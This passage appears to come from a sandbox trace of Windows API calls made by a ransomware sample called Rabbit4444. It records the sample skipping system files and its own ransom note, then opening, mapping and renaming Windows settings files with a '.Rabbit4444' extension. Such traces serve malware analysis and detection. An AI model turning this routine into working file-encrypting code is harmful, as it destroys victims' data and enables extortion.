[0057.320] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.320] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.320] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms", lpString2="boot") returned -1 [0057.320] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.320] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.320] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms" [0057.320] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.320] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms") returned 63 [0057.320] lstrlenW (lpString="Rabbit4444") returned 10 [0057.320] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.321] lstrlenW (lpString=".dll") returned 4 [0057.321] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.321] lstrlenW (lpString=".lnk") returned 4 [0057.321] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.321] lstrlenW (lpString=".ini") returned 4 [0057.321] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.321] lstrlenW (lpString=".sys") returned 4 [0057.321] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.321] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_enabletouchpad.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.321] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.321] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14863175437) returned 1 [0057.321] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1270) returned 1 [0057.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0057.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0057.321] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0057.322] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0057.323] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.323] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0057.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.323] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.323] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0057.323] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14863421469) returned 1 [0057.324] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0057.324] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0057.324] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.324] CloseHandle (hObject=0x298) returned 1 [0057.324] CloseHandle (hObject=0x278) returned 1 [0057.324] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms.Rabbit4444") returned 191 [0057.324] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_enabletouchpad.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_enabletouchpad.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.324] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28ff3009, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x28ff3009, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x512, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms", cAlternateFileName="AA4060~1.SET")) returned 1 [0057.325] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.325] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.325] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.325] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms", lpString2=".") returned 1 [0057.325] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms", lpString2="..") returned 1 [0057.325] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms", lpString2="windows") returned -1 [0057.325] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.325] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.325] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms", lpString2="boot") returned -1 [0057.325] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.325] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.325] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms" [0057.325] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.325] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms") returned 69 [0057.325] lstrlenW (lpString="Rabbit4444") returned 10 [0057.325] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.325] lstrlenW (lpString=".dll") returned 4 [0057.325] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.325] lstrlenW (lpString=".lnk") returned 4 [0057.325] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.325] lstrlenW (lpString=".ini") returned 4 [0057.325] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.325] lstrlenW (lpString=".sys") returned 4 [0057.325] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.325] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_enablevisualfeedback.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.326] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.326] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14863652002) returned 1 [0057.326] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1298) returned 1 [0057.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.326] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0057.326] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.327] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0057.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0057.328] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14863898819) returned 1 [0057.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0057.328] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.328] CloseHandle (hObject=0x298) returned 1 [0057.329] CloseHandle (hObject=0x278) returned 1 [0057.329] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms.Rabbit4444") returned 197 [0057.329] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_enablevisualfeedback.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_enablevisualfeedback.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.329] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x291e2e7f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x291e2e7f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms", cAlternateFileName="AA50D8~1.SET")) returned 1 [0057.329] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.330] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.330] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.330] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms", lpString2=".") returned 1 [0057.330] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms", lpString2="..") returned 1 [0057.330] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms", lpString2="windows") returned -1 [0057.330] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.330] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.330] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms", lpString2="boot") returned -1 [0057.330] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.330] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.330] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms" [0057.330] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.330] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms") returned 71 [0057.330] lstrlenW (lpString="Rabbit4444") returned 10 [0057.330] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.330] lstrlenW (lpString=".dll") returned 4 [0057.330] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.330] lstrlenW (lpString=".lnk") returned 4 [0057.331] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.331] lstrlenW (lpString=".ini") returned 4 [0057.331] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.331] lstrlenW (lpString=".sys") returned 4 [0057.331] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.331] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_enablevisualfeedbackpm.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.331] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.331] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14864170763) returned 1 [0057.331] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1308) returned 1 [0057.331] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.331] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0057.331] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.332] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.333] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14864412945) returned 1 [0057.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.333] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0057.333] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.334] CloseHandle (hObject=0x298) returned 1 [0057.334] CloseHandle (hObject=0x278) returned 1 [0057.334] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms.Rabbit4444") returned 199 [0057.334] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_enablevisualfeedbackpm.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_enablevisualfeedbackpm.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.338] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x292a1a55, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x292a1a55, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x514, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms", cAlternateFileName="AABF11~1.SET")) returned 1 [0057.338] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.338] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.338] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.338] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.338] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.338] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.338] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.338] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.338] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.338] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.338] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.338] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms" [0057.338] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.339] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms") returned 69 [0057.339] lstrlenW (lpString="Rabbit4444") returned 10 [0057.339] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.339] lstrlenW (lpString=".dll") returned 4 [0057.339] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.339] lstrlenW (lpString=".lnk") returned 4 [0057.339] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.339] lstrlenW (lpString=".ini") returned 4 [0057.339] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.339] lstrlenW (lpString=".sys") returned 4 [0057.339] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.339] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_fourfingertapenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.339] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.339] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14865012101) returned 1 [0057.339] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1300) returned 1 [0057.339] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0057.340] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0057.340] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.342] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.343] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.344] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.344] HeapFree (in: hHeap=0xe0000, 